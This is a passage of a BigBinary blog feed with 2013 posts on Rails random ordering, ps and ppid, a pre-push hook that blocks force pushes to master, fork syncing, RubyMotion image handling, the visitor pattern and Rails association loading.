                            .paginate(per_page: 20, page: params[:page])</code></pre><h2>Set seed value in before_action</h2><p>For different users we should use different seed values, and the value should be random. So we set the seed value in a <code>before_action</code>.</p><pre><code class="language-ruby">def set_seed
  cookies[:random_seed] ||= SecureRandom.random_number
end</code></pre><p>Now change the query to use the seed value and we are all set.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Active Record is still magical]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/active-record-is-still-magical"/>
      <updated>2013-10-30T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/active-record-is-still-magical</id>
      <content type="html"><![CDATA[<p><img src="/blog_images/2013/active-record-is-still-magical/wicked_good_ruby_conf_2013_logo.png" alt="WickedGoodRubyConf"></p><p>I gave a talk at the <a href="http://wickedgoodruby.com/">Wicked Good Ruby Conference</a>. The conference was very well organized and I had a lot of fun meeting new people.</p><p>Confreaks has put out the video. Slides are below too. I'm sorry about the bad audio.</p><p>Boston in November is just awesome. I had a lot of fun driving around and enjoying the <a href="https://www.google.com/search?q=fall+in+boston&amp;espv=2&amp;tbm=isch&amp;tbo=u&amp;source=univ&amp;sa=X&amp;ei=O1XWU8OtLYKUyASHjYLACQ&amp;ved=0CBwQsAQ&amp;biw=1309&amp;bih=665#q=fall+in+boston&amp;tbm=isch">fall color</a>.</p><p>&lt;iframe width=&quot;714&quot; height=&quot;315&quot; src=&quot;https://www.youtube.com/embed/RUOvI_iMyDY&quot; frameborder=&quot;0&quot; allow=&quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture&quot; allowfullscreen&gt;&lt;/iframe&gt;&lt;br&gt;&lt;div style=&quot;left: 0; width: 100%; height: 0; position: relative; padding-bottom: 76.9014%;&quot;&gt;&lt;iframe src=&quot;https://speakerdeck.com/player/3909c200157f013102e61a54756b74c2?slide=8&quot; style=&quot;border: 0; top: 0; left: 0; width: 100%; height: 100%; position: absolute;&quot; allowfullscreen scrolling=&quot;no&quot; allow=&quot;encrypted-media&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;</p>]]></content>
    </entry><entry>
       <title><![CDATA[Getting arguments passed to command]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/getting-arguments-passed-to-command"/>
      <updated>2013-09-22T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/getting-arguments-passed-to-command</id>
      <content type="html"><![CDATA[<p>In the <a href="do-not-allow-force-push-to-master">previous blog</a> we discussed Ruby code where we used <code>ps -ocommand</code>. In this blog let's discuss how to get the arguments passed to a command.</p><h2>What is the issue</h2><p>In the referred blog we are trying to find out if the <code>--force</code> or <code>-f</code> argument was passed to the <code>git push</code> command.</p><p>The kernel knows the arguments that were passed to the command. So the only way to find the answer is to ask the kernel what the full command was. The tool to deal with such issues is <code>ps</code>.</p><p>In order to play with the <code>ps</code> command let's write a simple Ruby program first.</p><pre><code class="language-plaintext"># sl.rb
puts Process.pid
puts Process.ppid
sleep 99999999</code></pre><p>In a terminal execute <code>ruby sl.rb a b c</code>. In another terminal execute <code>ps</code>.</p><pre><code class="language-plaintext">$ ps
  PID TTY           TIME CMD
82246 ttys000    0:00.51 -bash
87070 ttys000    0:00.04 ruby sl.rb a b c
82455 ttys001    0:00.40 -bash</code></pre><p>So here I have two bash shells open in two different tabs in my terminal. The first terminal tab is running sl.rb. The second terminal tab is running <code>ps</code>. 
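</p><p>The same lookup can be done from Ruby itself. Here is a minimal sketch (illustrative, not from the original post; any pid works, and here the program just inspects itself):</p>

```ruby
# Ask the kernel, via ps, for the full command line of a process.
# "-o command=" prints only the COMMAND column, without a header row.
pid = Process.pid
command = `ps -o command= -p #{pid}`.strip
puts command
```

<p>For the force-push check from the previous blog, the interesting pid would be <code>Process.ppid</code>, i.e. the <code>git push</code> process that spawned the hook.</p><p>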
In the second terminal we can see the arguments that were passed to the program <code>sl.rb</code>.</p><p>By default <code>ps</code> lists all the processes belonging to the user executing the command and the processes started from the current terminal.</p><h2>Option -p</h2><p><code>ps -p 87070</code> shows the result only for the given process id.</p><pre><code class="language-plaintext">$ ps -p 87070
  PID TTY           TIME CMD
87070 ttys000    0:00.04 ruby sl.rb a b c</code></pre><p>We can pass more than one process id.</p><pre><code class="language-plaintext">$ ps -o pid,command -p 87070,82246
  PID COMMAND
82246 -bash
87070 ruby sl.rb a b c</code></pre><h2>Option -o</h2><p><code>ps -o</code> can be used to select the attributes that we want to be shown. For example, here I want only pids to be shown.</p><pre><code class="language-plaintext">$ ps -o pid
  PID
82246
87070
82455</code></pre><p>Now I want <code>pid</code> and <code>command</code>.</p><pre><code class="language-plaintext">$ ps -o pid,command
  PID COMMAND
82246 -bash
87070 ruby sl.rb a b c
82455 -bash</code></pre><p>I want the result only for a certain process id.</p><pre><code class="language-plaintext">$ ps -o command -p 87070
COMMAND
ruby sl.rb a b c</code></pre><p>Now we have the arguments that were passed to the command. This is what the code in the referred article was doing.</p><p>For the sake of completeness let's see a few more options.</p><h2>Option -e</h2><p><code>ps -e</code> lists all processes.</p><pre><code class="language-plaintext">$ ps -e
  PID TTY           TIME CMD
    1 ??         2:56.20 /sbin/launchd
   11 ??         0:01.90 /usr/libexec/UserEventAgent (System)
   12 ??         0:02.11 /usr/libexec/kextd
   14 ??         0:09.00 /usr/sbin/notifyd
   15 ??         0:05.81 /usr/sbin/securityd -i
   ........................................
   ........................................</code></pre><h2>Option -f</h2><p><code>ps -f</code> lists a lot more attributes including <code>ppid</code>.</p><pre><code class="language-plaintext">$ ps -f
  UID   PID  PPID   C STIME   TTY           TIME CMD
  501 82246 82245   0  2:06PM ttys000    0:00.51 -bash
  501 87070 82246   0  4:54PM ttys000    0:00.04 ruby sl.rb a b c
  501 82455 82452   0  2:07PM ttys001    0:00.42 -bash</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[What is ppid]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/what-is-ppid"/>
      <updated>2013-09-21T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/what-is-ppid</id>
      <content type="html"><![CDATA[<p>In the <a href="do-not-allow-force-push-to-master">previous blog</a> we discussed Ruby code where we used two things: <code>ppid</code> and <code>ps -ocommand</code>. In this blog let's discuss <code>ppid</code>. <code>ps -ocommand</code> is discussed in the <a href="getting-arguments-passed-to-command">next blog</a>.</p><h2>Parent process id is ppid</h2><p>We know that every process has a process id. This is usually referred to as <code>pid</code>. In the *nix world every process also has a parent process. And in Ruby the way to get the &quot;process id&quot; of the parent process is through <code>ppid</code>.</p><p>Let's see it in action. Time to fire up irb.</p><pre><code class="language-plaintext">irb(main):002:0&gt; Process.pid
=&gt; 83132
irb(main):003:0&gt; Process.ppid
=&gt; 82455</code></pre><p>Now keep the irb session open and go to another terminal tab. In this new tab execute <code>pstree -p 83132</code>.</p><pre><code class="language-plaintext">$ pstree -p 83132
-+= 00001 root /sbin/launchd
 \-+= 00151 nsingh /sbin/launchd
   \-+= 00189 nsingh /Applications/Utilities/Terminal.app/Contents/MacOS/Terminal -psn_0_45067
     \-+= 82452 root login -pf nsingh
       \-+= 82455 nsingh -bash
         \--= 83132 nsingh irb</code></pre><p>If <code>pstree</code> is not available then you can easily install it using <code>brew install pstree</code>.</p><p>As you can see from the output, the process id 83132 is at the very bottom of the tree. Its parent process id is 82455, which belongs to the &quot;bash shell&quot;.</p><p>In the irb session when we did <code>Process.ppid</code> we got the same value, 82455.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Do not allow force push to master]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/do-not-allow-force-push-to-master"/>
      <updated>2013-09-19T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/do-not-allow-force-push-to-master</id>
      <content type="html"><![CDATA[<p>At BigBinary we create a branch for every issue. We deploy that branch, and only when it is approved is that branch merged into master.</p><p>From time to time we rebase a branch. And after rebasing we need to do a <code>force</code> push to send the changes to GitHub. And once in a while someone <code>force</code> pushes to master by mistake. We recommend setting <a href="/how-we-work">push.default to current</a> to avoid such issues, but still sometimes a force push to master does happen.</p><p>In order to prevent such mistakes in the future we are using a <a href="https://github.com/bigbinary/tiny_scripts/blob/master/git-hooks/hooks/pre-push">pre-push hook</a>. This is a small Ruby program which runs before any <code>git push</code> command. If you are force pushing to <code>master</code> then it will reject the push like this.</p><pre><code class="language-plaintext">*************************************************************************
Your attempt to FORCE PUSH to MASTER has been rejected.

If you still want to FORCE PUSH then you need to ignore the pre_push git hook by executing following command.

git push master --force --no-verify
*************************************************************************</code></pre><h2>Requirements</h2><p>The <code>pre-push</code> hook was <a href="https://github.com/git/git/blob/master/Documentation/RelNotes/1.8.2.txt#L167">added to git</a> in version 1.8.2. So you need git 1.8.2 or higher. You can easily upgrade git by executing <code>brew upgrade git</code>.</p><pre><code class="language-plaintext">$ git --version
git version 1.8.2.3</code></pre><h2>Setting up hooks</h2><p>In order for these hooks to kick in they need to be set up.</p><p>The first step is to clone the <a href="https://github.com/bigbinary/tiny_scripts">repo</a> to your local machine. 
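</p><p>For context, the core of such a hook can be sketched in a few lines of Ruby. This is an illustrative simplification, not the actual BigBinary hook; it combines <code>Process.ppid</code> and <code>ps -o command</code> (discussed in the two follow-up posts) to inspect the <code>git push</code> invocation:</p>

```ruby
# Illustrative sketch of a pre-push check (not the actual hook).
# Returns true when the given push command force-pushes to master.
def force_push_to_master?(push_command)
  forced = push_command.match?(/\s(--force|-f)(\s|$)/)
  forced && push_command.include?("master")
end

# In a real hook the parent process is the `git push` invocation,
# and the hook would `exit 1` to abort the push.
parent_command = `ps -o command= -p #{Process.ppid}`.strip
warn "Force push to master rejected" if force_push_to_master?(parent_command)
```

<p>Note that <code>git push --no-verify</code> bypasses this check entirely, because git does not run the <code>pre-push</code> hook at all when <code>--no-verify</code> is given; that is what the escape hatch at the end of this post relies on.</p><p>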
Now open <code>~/.gitconfig</code> and add the following lines.</p><pre><code class="language-plaintext">[init]
  templatedir = /Users/neeraj/code/tiny_scripts/git-hooks</code></pre><p>Change the value <code>/Users/neeraj/code/tiny_scripts/git-hooks</code> to match the directory on your machine.</p><h2>Making existing repositories aware of this hook</h2><p>Now the <code>pre-push</code> hook is set up. Any new repository that you clone will have the feature of not being able to force push to master.</p><p>But existing repositories do not know about this git hook. To make existing repositories aware of this hook, execute the following command in each repository.</p><pre><code class="language-plaintext">$ git init
Reinitialized existing Git repository in /Users/nsingh/dev/projects/streetcommerce/.git/</code></pre><p>Now if you look into the <code>.git/hooks</code> directory of your project you should see a file called <code>pre-push</code>.</p><pre><code class="language-plaintext">$ ls .git/hooks/pre-push
.git/hooks/pre-push</code></pre><p>It means this project is all set with the <code>pre-push</code> hook.</p><h2>New repositories</h2><p>When you clone a repository, <code>git init</code> is invoked automatically and you will get <code>pre-push</code> already copied for you. So you are all set for all future repositories too.</p><h2>How to ignore the pre-push hook</h2><p>To ignore the <code>pre-push</code> hook all you need to do is</p><pre><code class="language-plaintext"># Use following command to ignore pre-push check and to force update master.
git push master --force --no-verify</code></pre><p><a href="https://github.com/bigbinary/tiny_scripts/blob/master/git-hooks/hooks/pre-push">The hook is here</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How to keep your fork up-to-date]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/how-to-keep-your-fork-uptodate"/>
      <updated>2013-09-13T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-to-keep-your-fork-uptodate</id>
      <content type="html"><![CDATA[<p>Let's say that I'm forking the repo <code>rails/rails</code>. After the repo has been forked to my account I will clone it on my local machine.</p><pre><code class="language-plaintext">git clone git@github.com:neerajsingh0101/rails.git</code></pre><p>Now <code>cd rails</code> and execute <code>git remote -v</code>. This is what I see.</p><pre><code class="language-plaintext">origin git@github.com:neerajsingh0101/rails.git (fetch)
origin git@github.com:neerajsingh0101/rails.git (push)</code></pre><p>Now I will add an <code>upstream</code> remote by executing the following command.</p><pre><code class="language-plaintext">git remote add upstream git://github.com/rails/rails.git</code></pre><p>After having done that, when I execute <code>git remote -v</code> I see</p><pre><code class="language-plaintext">origin git@github.com:neerajsingh0101/rails.git (fetch)
origin git@github.com:neerajsingh0101/rails.git (push)
upstream git://github.com/rails/rails.git (fetch)
upstream git://github.com/rails/rails.git (push)</code></pre><p>Now I want to make some changes to the code. After all, this is why I forked the repo.</p><p>Let's say that I want to add exception handling to the forked code I have locally. Then I create a branch called <code>exception-handling</code> and make all my changes in this branch. <strong>The key here is not to make any changes to the <code>master</code> branch</strong>. I try to keep master of my forked repository in sync with the master of the original repository from which I forked it.</p><p>So now let's create a branch and I will put all my changes there.</p><pre><code class="language-plaintext">git checkout -b exception-handling</code></pre><p>In the <code>Gemfile</code> of an application I can use this branch like this</p><pre><code class="language-plaintext">gem 'rails', github: 'neerajsingh0101/rails', branch: 'exception-handling'</code></pre><p>A month has passed. In the meantime rails master has had tons of changes. I want those changes in my <code>exception-handling</code> branch. In order to achieve that, first I need to bring my local master up-to-date with rails master.</p><p>I need to switch to the master branch and then execute the following commands.</p><pre><code class="language-plaintext">git checkout master
git fetch upstream
git rebase upstream/master
git push</code></pre><p>Now the master of the forked repository is in sync with the master of <code>rails/rails</code>. Now that master is up-to-date, I need to pull the changes from master into my <code>exception-handling</code> branch.</p><pre><code class="language-plaintext">git checkout exception-handling
git rebase master
git push -f</code></pre><p>Now my branch <code>exception-handling</code> has my fix on top of rails master.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How to setup Pinch to Zoom for an image in RubyMotion]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/pinch-to-zoom-for-an-image-in-rubymotion"/>
      <updated>2013-08-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/pinch-to-zoom-for-an-image-in-rubymotion</id>
      <content type="html"><![CDATA[<p>In this post we will see how to build &quot;pinch to zoom&quot; functionality to zoom in on an image in RubyMotion.</p><p>First let's add a <code>UIViewController</code> that is initialized with an image.</p><pre><code class="language-ruby">class ImageViewController &lt; UIViewController
  def initWithImage(image)
    @image = image
  end
end</code></pre><h2>UIScrollView and UIImageView</h2><p>Now we will add a <code>UIScrollView</code> with its frame set to the full screen size and some other properties as listed below.</p><pre><code class="language-ruby">@scrollView = UIScrollView.alloc.initWithFrame(UIScreen.mainScreen.bounds)
@scrollView.scrollEnabled = false
@scrollView.clipsToBounds = true
@scrollView.contentSize = @image.size
@scrollView.minimumZoomScale = 1.0
@scrollView.maximumZoomScale = 4.0
@scrollView.zoomScale = 0.3</code></pre><p>Create a new <code>UIImageView</code> and add it to the scrollView created above.</p><pre><code class="language-ruby">imageView = UIImageView.alloc.initWithImage(@image)
imageView.contentMode = UIViewContentModeScaleAspectFit
imageView.userInteractionEnabled = true
imageView.frame = @scrollView.bounds</code></pre><p>We are setting the image view's content mode to <code>UIViewContentModeScaleAspectFit</code>. The content mode can be set to <code>UIViewContentModeScaleToFill</code>, <code>UIViewContentModeScaleAspectFill</code> or <code>UIViewContentModeScaleAspectFit</code> depending on what suits your app. By default, the <code>contentMode</code> property for most views is set to <code>UIViewContentModeScaleToFill</code>, which causes the view's contents to be scaled to fit the new frame size. <a href="https://developer.apple.com/library/ios/documentation/windowsviews/conceptual/viewpg_iphoneos/WindowsandViews/WindowsandViews.html">This Apple doc</a> explains this behavior.</p><p>We need to add the above imageView as a subview of our scrollView.</p><pre><code class="language-ruby">@scrollView.addSubview(imageView)
self.view.addSubview(@scrollView)</code></pre><p>This is how our controller looks with all the above additions.</p><pre><code class="language-ruby">class ImageViewController &lt; UIViewController
  def initWithImage(image)
    @image = image

    @scrollView = UIScrollView.alloc.initWithFrame(UIScreen.mainScreen.bounds)
    @scrollView.scrollEnabled = false
    @scrollView.clipsToBounds = true
    @scrollView.contentSize = @image.size
    @scrollView.minimumZoomScale = 1.0
    @scrollView.maximumZoomScale = 4.0
    @scrollView.zoomScale = 0.3
    @scrollView.delegate = self

    imageView = UIImageView.alloc.initWithImage(@image)
    imageView.contentMode = UIViewContentModeScaleAspectFit
    imageView.userInteractionEnabled = true
    imageView.frame = @scrollView.bounds

    @scrollView.addSubview(imageView)
    self.view.addSubview(@scrollView)

    init
  end
end</code></pre><h2>ScrollView delegate</h2><p>We must set a delegate for our scroll view to support zooming. The delegate object must conform to the <code>UIScrollViewDelegate</code> protocol. This is the reason we are setting <code>@scrollView.delegate = self</code> above. The delegate class must implement the <code>viewForZoomingInScrollView</code> and <code>scrollViewDidZoom</code> methods.</p><pre><code class="language-ruby">def viewForZoomingInScrollView(scrollView)
  scrollView.subviews.first
end

def scrollViewDidZoom(scrollView)
  if scrollView.zoomScale != 1.0
    scrollView.scrollEnabled = true
  else
    scrollView.scrollEnabled = false
  end
end</code></pre><p>These two methods allow the scrollView to support pinch to zoom.</p><h2>Supporting orientation changes</h2><p>There is one more thing to do if we want to support orientation changes. We need to add the following methods:</p><pre><code class="language-ruby">def shouldAutorotateToInterfaceOrientation(*)
  true
end

def viewDidLayoutSubviews
  @scrollView.frame = self.view.bounds
end</code></pre><p>We have to set the scrollView's frame to the view bounds in <code>viewDidLayoutSubviews</code> so that the scrollView frame is resized when the device orientation changes.</p><p>That's it. With all those changes our app supports orientation changes and we are able to pinch to zoom images.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Fix image orientation issue in RubyMotion]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/rubymotion-image-orientation"/>
      <updated>2013-08-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rubymotion-image-orientation</id>
      <content type="html"><![CDATA[<p>I'm building an app using RubyMotion. When I take a picture it all looks good. However, when the picture is posted on the web, the orientation of the picture is different.</p><h2>UIImage and UIImageOrientation</h2><p><a href="https://developer.apple.com/library/ios/documentation/uikit/reference/UIImage_Class/Reference/Reference.html">UIImage</a> in iOS has a property called <code>imageOrientation</code> of type UIImageOrientation. Image orientation affects the way the image data is displayed when drawn. The API docs mention that by default images are displayed in the <code>up</code> orientation. However, if the image has associated metadata (such as EXIF information), then this property contains the orientation indicated by that metadata.</p><p>After using <a href="https://developer.apple.com/library/ios/documentation/uikit/reference/UIImagePickerController_Class/UIImagePickerController/UIImagePickerController.html">UIImagePickerController</a> to take an image using the iPhone camera, I was using BubbleWrap to send the image to a webserver. Whether the image was taken in landscape or portrait mode, it appeared fine when viewed in the browser. But when the image was sent back via the API and shown on the iPhone, it was rotated by 90 degrees if it had been taken in portrait mode. In the EXIF metadata, iOS incorrectly sets the orientation to UIImageOrientationRight.</p><p>Here is how I fixed the image orientation issue:</p><pre><code class="language-ruby">if image.imageOrientation == UIImageOrientationUp
  return_image = image
else
  UIGraphicsBeginImageContextWithOptions(image.size, false, image.scale)
  image.drawInRect([[0, 0], image.size])
  normalized_image = UIGraphicsGetImageFromCurrentImageContext()
  UIGraphicsEndImageContext()
  return_image = normalized_image
end</code></pre><p>First, we check the orientation of the image we have in hand. If the image orientation is UIImageOrientationUp, we don't have to change anything. Otherwise we redraw the image and return the normalized image.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Visitor pattern and double dispatch in ruby]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/visitor-pattern-and-double-dispatch"/>
      <updated>2013-07-07T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/visitor-pattern-and-double-dispatch</id>
      <content type="html"><![CDATA[<p>Let's say that we have an AST that holds integer nodes. We want to print doublethe value of all nodes. We can do something like this</p><pre><code class="language-ruby">class IntegerNode  def initialize(value)    @value = value  end  def double    @value * 2  endendclass Ast  def initialize    @nodes = []    @nodes &lt;&lt; IntegerNode.new(2)    @nodes &lt;&lt; IntegerNode.new(3)  end  def print_double    @nodes.each do |node|      puts node.double    end  endendast = Ast.newast.print_double # =&gt; 4 6</code></pre><p>Above solution works. Now let's try to print triple the value. In order to dothat we need to change class <code>IntegerNode</code>. And <code>IntegerNode</code> has knowledge ofhow to print <code>triple</code> value. Tomorrow if we have another node called <code>FloatNode</code>then that node will have knowledge about how to <code>double</code> and <code>triple</code> the value.</p><p>Nodes are merely storing information. And the representation of data should beseparate from the data itself. So <code>IntegerNode</code> and <code>FloatNode</code> should not knowabout how to <code>double</code> and <code>triple</code>.</p><p>To take the data representation code out of nodes we can make use of<a href="http://en.wikipedia.org/wiki/Visitor_pattern">visitor pattern</a> . Visitorpattern uses <a href="http://en.wikipedia.org/wiki/Double_dispatch">double dispatch</a> .</p><p>Before we look at &quot;double dispatch&quot; let's first look at &quot;single dispatch&quot;.</p><h2>Single dispatch</h2><p>When we invoke a method in ruby we are using single dispatch. In singledispatch, method invocation is done based on a single criteria: class of theobject. 
Most of the object oriented programming languages use <code>single dispatch</code>system.</p><p>In the following case method <code>double</code> is invoked solely based on the class of<code>node</code>.</p><pre><code class="language-ruby">node.double</code></pre><h2>Double dispatch</h2><p>As the name suggests in the case of <code>Double dispatch</code> dispatching depends on twothings: class of the object and the class of the input object.</p><p>Ruby inherently does not support &quot;Double dispatch&quot;. We will see how to getaround that issue shortly. First let's see an example in Java which supportDouble dispatch. Java supports <code>method overloading</code> which allows two methodswith same name to differ only in the type of argument it receives.</p><pre><code class="language-java">class Node   def double(Integer value); value *2; end   def double(String value); Integer.parseInt(value) * 2; endendnode.double(2)node.double(&quot;51&quot;)</code></pre><p>In the above case the method that would be invoked is decided based on twothings: class of the object ( node ) and the class of the value (Integer orString). That's why this is called <code>Double dispatch</code>.</p><p>In ruby we can't have two methods with same name and different signature becausethe second method would override the first method. In order to get around thatlimitation usually the method name has class name. Let's try to write above javacode in ruby.</p><pre><code class="language-ruby">class Node  def accept value   method_name = &quot;visit_#{value.class}&quot;   send method_name  end  def visit_Integer value   value * 2  end  def visit_String value    value.to_i * 2  endend</code></pre><p>If the above code is not very clear then don't worry. We are going to look atvisitor pattern in ruby and that will make the above code clearer.</p><h2>Visitor pattern</h2><p>Now let's get back to the problem of traversing the AST. 
This time we are going to use &quot;double dispatch&quot; so that node information is separate from representation information.</p><p>In the visitor pattern the <code>nodes</code> define a method called <code>accept</code>. That method accepts the visitor and then calls <code>visit</code> on the visitor, passing itself as the argument.</p><p>Below is a concrete example of the visitor pattern. You can see that <code>IntegerNode</code> has a method <code>accept</code> which takes an instance of a <code>visitor</code> as argument. And then the <code>visit</code> method of the visitor is invoked.</p><pre><code class="language-ruby">class Node
  def accept visitor
    raise NotImplementedError.new
  end
end

module Visitable
  def accept visitor
    visitor.visit self
  end
end

class IntegerNode &lt; Node
  include Visitable

  attr_reader :value

  def initialize value
    @value = value
  end
end

class Ast &lt; Node
  def initialize
    @nodes = []
    @nodes &lt;&lt; IntegerNode.new(2)
    @nodes &lt;&lt; IntegerNode.new(3)
  end

  def accept visitor
    @nodes.each do |node|
      node.accept visitor
    end
  end
end

class DoublerVisitor
  def visit subject
    puts subject.value * 2
  end
end

class TriplerVisitor
  def visit subject
    puts subject.value * 3
  end
end

ast = Ast.new
puts &quot;Doubler:&quot;
ast.accept DoublerVisitor.new
puts &quot;Tripler:&quot;
ast.accept TriplerVisitor.new

# =&gt;
# Doubler:
# 4
# 6
# Tripler:
# 6
# 9</code></pre><p>The above code used only <code>IntegerNode</code>. In the next example I have added <code>StringNode</code>. Now notice how the <code>visit</code> method changed.
Now, based on the class of the argument, the method to dispatch to is decided.</p><pre><code class="language-ruby">class Node
  def accept visitor
    raise NotImplementedError.new
  end
end

module Visitable
  def accept visitor
    visitor.visit(self)
  end
end

class IntegerNode &lt; Node
  include Visitable

  attr_reader :value

  def initialize value
    @value = value
  end
end

class StringNode &lt; Node
  include Visitable

  attr_reader :value

  def initialize value
    @value = value
  end
end

class Ast &lt; Node
  def initialize
    @nodes = []
    @nodes &lt;&lt; IntegerNode.new(2)
    @nodes &lt;&lt; StringNode.new(&quot;3&quot;)
  end

  def accept visitor
    @nodes.each do |node|
      node.accept visitor
    end
  end
end

class BaseVisitor
  def visit subject
    method_name = &quot;visit_#{subject.class}&quot;.intern
    send(method_name, subject)
  end
end

class DoublerVisitor &lt; BaseVisitor
  def visit_IntegerNode subject
    puts subject.value * 2
  end

  def visit_StringNode subject
    puts subject.value.to_i * 2
  end
end

class TriplerVisitor &lt; BaseVisitor
  def visit_IntegerNode subject
    puts subject.value * 3
  end

  def visit_StringNode subject
    puts subject.value.to_i * 3
  end
end

ast = Ast.new
puts &quot;Doubler:&quot;
ast.accept DoublerVisitor.new
puts &quot;Tripler:&quot;
ast.accept TriplerVisitor.new

# =&gt;
# Doubler:
# 4
# 6
# Tripler:
# 6
# 9</code></pre><h2>Real world usage</h2><p><a href="https://github.com/rails/arel">Arel</a> uses the visitor pattern to build queries tailored to the specific database. You can see that it has a visitor class for <a href="https://github.com/rails/rails/blob/master/activerecord/lib/arel/visitors/sqlite.rb">sqlite3</a>, <a href="https://github.com/rails/rails/blob/master/activerecord/lib/arel/visitors/mysql.rb">mysql</a> and <a href="https://github.com/rails/rails/blob/master/activerecord/lib/arel/visitors/postgresql.rb">Postgresql</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Preload, Eagerload, Includes and Joins]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/preload-vs-eager-load-vs-joins-vs-includes"/>
      <updated>2013-07-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/preload-vs-eager-load-vs-joins-vs-includes</id>
      <content type="html"><![CDATA[<p>Rails provides four different ways to load association data. In this blog we are going to look at each of them.</p><h2>Preload</h2><p>Preload loads the association data in a separate query.</p><pre><code class="language-ruby">User.preload(:posts).to_a

# =&gt;
SELECT &quot;users&quot;.* FROM &quot;users&quot;
SELECT &quot;posts&quot;.* FROM &quot;posts&quot;
  WHERE &quot;posts&quot;.&quot;user_id&quot; IN (1)</code></pre><p>This is how <code>includes</code> loads data in the default case.</p><p>Since <code>preload</code> always generates two SQL queries, we can't use the <code>posts</code> table in a where condition. The following query will result in an error.</p><pre><code class="language-ruby">User.preload(:posts).where(&quot;posts.desc='ruby is awesome'&quot;)

# =&gt;
SQLite3::SQLException: no such column: posts.desc:
SELECT &quot;users&quot;.* FROM &quot;users&quot;
  WHERE (posts.desc='ruby is awesome')</code></pre><p>With <code>preload</code>, where clauses that refer only to the <code>users</code> table can still be applied.</p><pre><code class="language-ruby">User.preload(:posts).where(&quot;users.name='Neeraj'&quot;)

# =&gt;
SELECT &quot;users&quot;.* FROM &quot;users&quot;
  WHERE (users.name='Neeraj')
SELECT &quot;posts&quot;.* FROM &quot;posts&quot;
  WHERE &quot;posts&quot;.&quot;user_id&quot; IN (3)</code></pre><h2>Includes</h2><p>Includes loads the association data in a separate query just like <code>preload</code>.</p><p>However it is smarter than <code>preload</code>. Above we saw that <code>preload</code> failed for the query <code>User.preload(:posts).where(&quot;posts.desc='ruby is awesome'&quot;)</code>.
Let's trysame with includes.</p><pre><code class="language-ruby">User.includes(:posts).where('posts.desc = &quot;ruby is awesome&quot;').to_a# =&gt;SELECT &quot;users&quot;.&quot;id&quot; AS t0_r0, &quot;users&quot;.&quot;name&quot; AS t0_r1, &quot;posts&quot;.&quot;id&quot; AS t1_r0,       &quot;posts&quot;.&quot;title&quot; AS t1_r1,       &quot;posts&quot;.&quot;user_id&quot; AS t1_r2, &quot;posts&quot;.&quot;desc&quot; AS t1_r3FROM &quot;users&quot; LEFT OUTER JOIN &quot;posts&quot; ON &quot;posts&quot;.&quot;user_id&quot; = &quot;users&quot;.&quot;id&quot;WHERE (posts.desc = &quot;ruby is awesome&quot;)</code></pre><p>As you can see <code>includes</code> switches from using two separate queries to creating asingle <code>LEFT OUTER JOIN</code> to get the data. And it also applied the suppliedcondition.</p><p>So <code>includes</code> changes from two queries to a single query in some cases. Bydefault for a simple case it will use two queries. Let's say that for somereason you want to force a simple <code>includes</code> case to use a single query insteadof two. 
Use <code>references</code> to achieve that.</p><pre><code class="language-ruby">User.includes(:posts).references(:posts).to_a# =&gt;SELECT &quot;users&quot;.&quot;id&quot; AS t0_r0, &quot;users&quot;.&quot;name&quot; AS t0_r1, &quot;posts&quot;.&quot;id&quot; AS t1_r0,       &quot;posts&quot;.&quot;title&quot; AS t1_r1,       &quot;posts&quot;.&quot;user_id&quot; AS t1_r2, &quot;posts&quot;.&quot;desc&quot; AS t1_r3FROM &quot;users&quot; LEFT OUTER JOIN &quot;posts&quot; ON &quot;posts&quot;.&quot;user_id&quot; = &quot;users&quot;.&quot;id&quot;</code></pre><p>In the above case a single query was done.</p><h2>Eager load</h2><p>eager loading loads all association in a single query using <code>LEFT OUTER JOIN</code>.</p><pre><code class="language-ruby">User.eager_load(:posts).to_a# =&gt;SELECT &quot;users&quot;.&quot;id&quot; AS t0_r0, &quot;users&quot;.&quot;name&quot; AS t0_r1, &quot;posts&quot;.&quot;id&quot; AS t1_r0,       &quot;posts&quot;.&quot;title&quot; AS t1_r1, &quot;posts&quot;.&quot;user_id&quot; AS t1_r2, &quot;posts&quot;.&quot;desc&quot; AS t1_r3FROM &quot;users&quot; LEFT OUTER JOIN &quot;posts&quot; ON &quot;posts&quot;.&quot;user_id&quot; = &quot;users&quot;.&quot;id&quot;</code></pre><p>This is exactly what <code>includes</code> does when it is forced to make a single querywhen <code>where</code> or <code>order</code> clause is using an attribute from <code>posts</code> table.</p><h2>Joins</h2><p>Joins brings association data using <code>inner join</code>.</p><pre><code class="language-ruby">User.joins(:posts)# =&gt;SELECT &quot;users&quot;.* FROM &quot;users&quot; INNER JOIN &quot;posts&quot; ON &quot;posts&quot;.&quot;user_id&quot; = &quot;users&quot;.&quot;id&quot;</code></pre><p>In the above case no posts data is selected. 